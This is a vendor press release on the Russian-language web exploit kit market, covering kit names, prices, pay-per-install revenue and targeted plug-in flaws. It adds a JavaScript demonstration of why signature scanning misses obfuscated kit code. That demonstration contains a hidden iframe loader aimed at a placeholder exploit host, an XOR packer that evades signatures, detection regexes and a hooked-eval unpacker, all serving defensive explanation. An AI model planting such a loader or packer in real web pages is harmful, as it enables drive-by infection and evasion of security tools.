M86 Security Labs Report Details Web Exploit Kits

Web Exploits - There's an App for That details the rise of distributed, monetized "exploit" kits

May 5, 2010

Orange, Calif. and London, UK - APRIL 28, 2010 - M86 Security, the global expert in Web and email threat protection, today announced the release of the latest security report from M86 Security Labs, "Web Exploits - There's an App for That," which details the rise of distributed, monetized "exploit" kits; M86 Security Labs counted more than a dozen new attack kits launched in just the last six months. M86 Security Labs also noted that most of the exploit kits, such as Adpack and Fragus, are written in Russian, perhaps indicating where the buyers are, and that the majority rely on Adobe Flash, Java class and PDF-based exploits.

The code used in the exploit kits observed, particularly the malicious JavaScript, is often obfuscated, which greatly reduces the ability of many security products to even 'read' the code. All of the kits observed pose a serious threat to Web and email users: they are packaged applications that let less technical individuals run cyber attacks easily and inexpensively. These kits have quickly become a major driver of the exploits seen in the "wild" on the Internet.

Report Underscores Global Impact of the Attack Kit Business

Altogether M86 Security Labs investigated more than 25 attack kits, many of them in Russian, such as Crimepack, WebAttacker, MyPolySploit, XCore, UniquePack, LuckySploit, Yes Toolkit, Liberty, Fiesta, Eleonore and more. One of the most expensive attack kits found was LuckySploit at over $1000 USD, with most in the $400-$1000 USD range, and some selling for as little as $100 USD.

"Exploit kits have changed the cybercrime industry in a very short period of time," said Bradley Anstis, vice president of technology strategy, M86 Security. "People can launch attacks without even knowing a line of code, and the infrastructure now exists to pay the attacker per exploit achieved. With an attack kit there is literally 'an app for that' and it is driving the explosive growth in Internet-borne threats such as spam and zero-day attacks with new kits popping up every day. This latest research report details the anatomy of these kits, providing insight into the evolution and the skyrocketing increase in the number of attacks."

Creators of exploit kits can make money by offering various services, such as:

- The sale of exploit kits for a flat fee
- The purchase of an obfuscator replacement for an additional fee (to prevent anti-virus software from recognizing the malicious code)
- An extra charge to cover any new hosting domain installations (in the event the current domain is discovered and blacklisted by security vendors)
- Simply adding new exploits to increase the successful exploitation rate

Users of exploit kits have many ways of making money as well. Pay-Per-Install (PPI) programs are one example where the criminals are paid for installing third-party malware. In this case, the exploit kit operator finds a suitable PPI program and becomes an affiliate earning money for each successful install.

Most kits serve a different set of exploits depending on the visitor's browser - from the antiquated MDAC exploit for Internet Explorer 6 to the infamous PDF exploits printf, collectEmailInfo and getIcon (util.printf, Collab.collectEmailInfo and Collab.getIcon in the Adobe Reader JavaScript API), which affect the vast user base of Adobe Acrobat/Reader, plus an increasing number of Flash and Java class vulnerabilities. Zero-day exploits achieve the highest exploitation rates, so kit creators continually update the set of exploits included in their product to keep that rate high.

In the latest M86 report, an FS Pack admin console shows 5,032 successful installs for a single day. Under a PPI model in which the affiliate earns a modest $100.00 USD per 1,000 installs, that day's installs are worth about $500.00 USD (5,032 x $0.10 = $503.20).

Organizations and individuals seeking to protect their computers and information from cybercriminals should deploy solutions that detect zero-day exploits, and should patch the Flash, Adobe Reader and Java class vulnerabilities these kits target, to protect against the growing "exploit" market. Because the kits obfuscate their attack code, particularly the JavaScript, traditional signature-based security products are further weakened against them. Real-time code analysis tools, however, can close this growing threat window.
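To make the obfuscation point concrete, here is an added example written for this page; it is not code from the M86 report, from M86's products or from any real kit, and every name, signature pattern and hostname in it is made up for the illustration. It builds a constructed hidden-iframe loader of the kind a kit injects into a compromised page, packs it the way a simple kit-style packer would (XOR the characters into a char-code array and rebuild-then-eval at runtime), shows that a signature check matches the plain loader but not the packed one, and then runs the packed script with eval, document and window stubbed out so each decoded stage is captured and re-scanned, which is one form of the dynamic analysis the paragraph above refers to. The unpacker follows eval chains several layers deep, since kits often stack packers.

```javascript
// Added example (not from the M86 report or any real kit): why a
// signature-based scanner misses packed kit JavaScript, and how executing
// the decoder stage with eval() hooked recovers the payload for re-scanning.
// Every name, signature and hostname below is made up for the illustration.

// Constructed "payload": the kind of hidden iframe loader a kit injects
// into a compromised page. exploit.example is a placeholder host.
const PLAIN_PAYLOAD =
  'document.write("<iframe src=\\"http://exploit.example/in.php\\" ' +
  'width=0 height=0></iframe>");';

// A minimal kit-style packer: XOR each character with a one-byte key,
// emit the codes as an array, and rebuild + eval the string at runtime.
// Real packers are more elaborate, but the detection problem is the same:
// nothing in the packed output resembles the original source.
function obfuscate(src, key = 0x2a) {
  const codes = Array.from(src, (c) => c.charCodeAt(0) ^ key);
  return (
    'var k=[' + codes.join(',') + '];var s="";' +
    'for(var i=0;i<k.length;i++){s+=String.fromCharCode(k[i]^' + key + ');}' +
    'eval(s);'
  );
}

// Signature-style detector: patterns a static engine might carry for
// hidden-iframe injection. They only fire if the source is readable.
const SIGNATURES = [
  /document\.write\s*\(\s*["']\s*<iframe/i,
  /<iframe[^>]*width\s*=\s*["']?0\b[^>]*height\s*=\s*["']?0\b/i,
];

function signatureMatch(script) {
  return SIGNATURES.some((re) => re.test(script));
}

// Dynamic stage: run the script in a throwaway function whose `eval`,
// `document` and `window` parameters shadow the real ones. Each string the
// script hands to eval is recorded and fed back in, so multi-layer packers
// unwrap up to maxDepth levels. Code built by the Function constructor is
// always sloppy mode, so naming a parameter `eval` is legal here.
function unpack(script, maxDepth = 5) {
  const stages = [];
  const run = (code, depth) => {
    if (depth >= maxDepth) return;
    const fakeEval = (s) => {
      const text = String(s);
      stages.push(text);
      run(text, depth + 1);
    };
    const fakeDocument = { write() {}, writeln() {} };
    const fakeWindow = { location: { href: 'http://victim.example/' } };
    try {
      new Function('eval', 'document', 'window', code)(fakeEval, fakeDocument, fakeWindow);
    } catch (_) {
      // A stage that throws (e.g. expects a real DOM) still leaves whatever
      // it already handed to eval in `stages`.
    }
  };
  run(script, 0);
  return stages;
}

// Combine both passes: static verdict on the raw script, dynamic verdict on
// every decoded stage.
function analyze(script) {
  const stages = unpack(script);
  return {
    staticHit: signatureMatch(script),
    dynamicHit: stages.some(signatureMatch),
    stages,
  };
}

// Demo on the constructed sample: staticHit false, dynamicHit true.
const report = analyze(obfuscate(PLAIN_PAYLOAD));
console.log(JSON.stringify(report, null, 2));
```

The stub environment here is deliberately tiny. A real kit's decoder stage may route through setTimeout, Function, document.write of a script tag, or DOM properties rather than a bare eval, and may probe the environment and go quiet when it does not look like a browser, so a production analyser has to hook those sinks as well and present a plausible navigator and document; the principle, scanning what the code produces at runtime rather than what it looks like on disk, is the same.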

The "Web Exploits - There's an App for That" report is available from M86 Security Labs at: http://www.m86security.com/documents/pdfs/security_labs/m86_web_exploits_report.pdf.

About M86 Security

M86 Security is the global expert in real-time threat protection and the industry's leading Secure Web Gateway provider. The company's appliance, software, and Software as a Service (SaaS) solutions for Web and email security protect more than 24,000 customers and over 17 million users worldwide. M86 products use patented real-time code analysis and behavior-based malware detection technologies as well as threat intelligence from M86 Security Labs to protect networks against new and advanced threats, secure confidential information, and ensure regulatory compliance. The company is based in Orange, California with international headquarters in London and development centers in California, Israel, and New Zealand. For more information about M86 Security, please visit http://www.m86security.com/.

Follow M86 Security on:
Twitter: http://twitter.com/M86Security
Facebook: http://www.facebook.com/M86Sec
M86 Security Labs Blog: http://www.m86security.com/trace/traceblog.asp
